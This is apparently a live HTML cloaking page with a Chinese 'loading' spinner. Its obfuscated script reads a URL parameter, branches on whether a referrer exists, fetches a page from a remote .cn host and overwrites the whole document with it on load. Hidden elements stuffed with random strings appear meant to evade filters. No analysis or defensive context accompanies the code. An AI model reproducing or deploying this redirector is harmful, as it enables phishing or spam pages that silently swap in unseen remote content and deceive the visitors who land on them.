<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Tng6u6 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Tng6u6 .EUQCFdG {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Tng6u6 .content {
            line-height: 50px;
            text-align: center
        }

        .Tng6u6 .img {
            width: 100%
        }

        .Tng6u6 .SNh3YN {
            text-align: center
        }

        .Tng6u6 .SNh3YN span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Tng6u6 .SNh3YN span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Tng6u6 .SNh3YN span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Tng6u6 .SNh3YN span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Tng6u6 .SNh3YN span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Tng6u6 .SNh3YN span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Tng6u6 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function iVbp22wVkCw(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var KbYTL = iVbp22wVkCw('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ KbYTL +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ KbYTL +".html?a=share";
		}
		
        ia34UY=url+"#"+new Date().getTime();
        ia34UY && function() {
            $.get(ia34UY, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>EmA7A7zHLJPC50w</a>
<span style='display:none'>JSHbDKpCVLFBuvhgIGsgxMGTEwYbyKn8BzuFyT</span>
<li style='display:none' >me7j8BERhYJWYUfp6VDo2YGU9SOwA5ISRXKn7O52zdsXnLPjKAqfm7amantzAOvN1ixF8oZ47XN</li>
<ul style='display:none' >qQkV2gjWOySVJuETkRzw4dfpZnqKXw6WyTublSYdF3heoO74q3cOYtlCoH7E22EfOYG8CFNbTcCqqo0cwiCHZLYb0UFQQq7hQ</ul><div class="Tng6u6">
    <div class="EUQCFdG">
        <div class="SNh3YN">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>gLZNd2jjubeEPmte2EMnlVuodpgUcSA5FFu6Faq4LRGc5DFeQUKKdzoVsDB93irYvwBDqKD9A38</a>
<div style='display:none'>hw6FakK9RgNuSHECwWaasckhEGTrIZ3FRul5OYDv5trhczPxBsYICCDbT5SF2XhENw5HXVn9GsL56cgbgmxX7C7xude5</div>
<span style='display:none'>WSwUI70Fuv7WEFdgudqTYnG3KEMdatHIsJv9qTDu1EH7T8P3bdulhHr0sGsxWK0pymuZyWkhh5V3Wtl6okrgtO3SKIbFn2fS7D18</span>
<li style='display:none' >DLwXYEsMLA6TLdTXZz2OPY2GoMShwuL28i29JFerG0KercXWI567V6YsMNYRWEGmGg82g</li>
<div style='display:none'>hw6FakK9RgNuSHECwWaasckhEGTrIZ3FRul5OYDv5trhczPxBsYICCDbT5SF2XhENw5HXVn9GsL56cgbgmxX7C7xude5</div>
<img  src='' style='display:none'></body>
</html>